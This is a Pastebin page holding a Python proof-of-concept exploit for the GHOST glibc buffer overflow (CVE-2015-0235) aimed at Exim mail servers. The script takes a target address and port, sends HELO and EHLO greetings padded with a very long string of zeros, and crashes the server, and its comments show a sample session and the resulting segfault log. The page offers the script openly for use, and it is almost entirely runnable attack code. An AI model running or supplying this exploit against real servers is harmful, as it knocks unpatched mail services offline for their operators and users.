API tools faq
paste
Advertisement
_d3f4ult

[+] ghost-smtp-dos.py [+]

_d3f4ult
Jan 30th, 2015
1,702
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 3.97 KB | None | 0 0
raw download clone embed print report
  1. The below script is a PoC exploit for the GHOST vulnerability affecting Exim SMTP servers resulting in a service crash.
  2.  
  3. #!/usr/bin/python
  4. # Exim ESMTP DoS Exploit by 1N3 v20150128
  5. # CVE-2015-0235 GHOST glibc gethostbyname buffer overflow
  6. # http://crowdshield.com
  7. #
  8. # USAGE: python ghost-smtp-dos.py <ip> <port>
  9. #
  10. # Escape character is '^]'.
  11. # 220 debian-7-7-64b ESMTP Exim 4.80 ...
  12. # HELO
  13. # 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
  14.  00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
  15. # Connection closed by foreign host.
  16. #
  17. # user () debian-7-7-64b:~$ dmesg
  18. # ...
  19. # [ 1715.842547] exim4[2562]: segfault at 7fabf1f0ecb8 ip 00007fabef31bd04 sp 00007fffb427d5b0 error 6 in
  20. # libc-2.13.so[7fabef2a2000+182000]
  21.  
  22. import socket
  23. import time
  24. import sys, getopt
  25.  
  26. def main(argv):
  27.     argc = len(argv)
  28.  
  29.     if argc <= 1:
  30.             print "usage: %s <host>" % (argv[0])
  31.             sys.exit(0)
  32.  
  33.     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  34.     buffer = "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
  35. 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
  36.  
  37.     target = argv[1] # SET TARGET
  38.     port = argv[2] # SET PORT
  39.  
  40.     print "(--==== Exim ESMTP DoS Exploit by 1N3 - https://crowdshield.com"
  41.     print "(--==== Sending GHOST SMTP DoS to " + target + ":" + port + " with length:" +str(len(buffer))
  42.     s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  43.     connect=s.connect((target,int(port)))
  44.     data = s.recv(1024)
  45.     print "CONNECTION: " +data
  46.     s.send('HELO ' + buffer + '\r\n')
  47.     data = s.recv(1024)
  48.     print "received: " +data
  49.     s.send('EHLO ' + buffer + '\r\n')
  50.     data = s.recv(1024)
  51.     print "received: " +data
  52.     s.close()
  53.  
  54. main(sys.argv)
  55.  
  56.         #  1337day.com [2015-01-30]  #
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!